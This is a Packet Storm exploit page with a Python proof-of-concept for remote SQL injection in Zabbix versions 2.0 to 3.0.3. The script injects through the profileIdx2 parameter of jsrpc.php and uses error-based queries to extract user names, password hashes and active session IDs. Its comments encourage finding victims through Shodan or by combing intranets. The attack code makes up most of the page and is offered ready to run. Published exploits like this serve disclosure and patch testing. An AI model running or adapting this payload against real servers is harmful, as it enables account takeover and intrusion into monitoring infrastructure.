what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Zabbix 3.0.3 SQL Injection

Zabbix 3.0.3 SQL Injection
Posted Sep 8, 2016
Authored by Zzzians

Zabbix versions 2.0 through 3.0.3 remote SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | f77cd4a0efdd3d42737adcdbcd96a0e95d10ec5bbb8dfa0c6935115663dde1ee

Zabbix 3.0.3 SQL Injection

Change Mirror Download
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Data: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)

# PoC Author: Zzzians
# Contact: Zzzians@gmail.com
# Test on: Linux (Debian/CentOS/Ubuntu)

# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
try:
response = urllib2.urlopen(payload, timeout=20).read()
except Exception, msg:
print '\t\tOpps,an error occurs...',msg
else:
result_reg = re.compile(reg)
results = result_reg.findall(response)
print payload #Uncomment this to see details
if results:
return results[0]
def exploit(url,userid):
passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
if(password):
print '[+]Username~Password : %s' % password
else:
print '[-]Get Password Failed'
session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
if(session_id):
print "[+]Session_idi1/4%s" % session_id
else:
print "[-]Get Session id Failed"
print '\n'

def main():
print '=' * 70
print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
print '\t\t Author:Zzzians(Zzzians@gmail.com)'
print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
print '\t\t\t Timei1/42016-08-20\n'
urls = ["http://10.15.5.86"]
ids = [1,2]
for url in urls:
if url[-1] != '/': url += '/'
print '='*25 + url + '='*25
for userid in ids:
exploit(url,userid)
main()

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close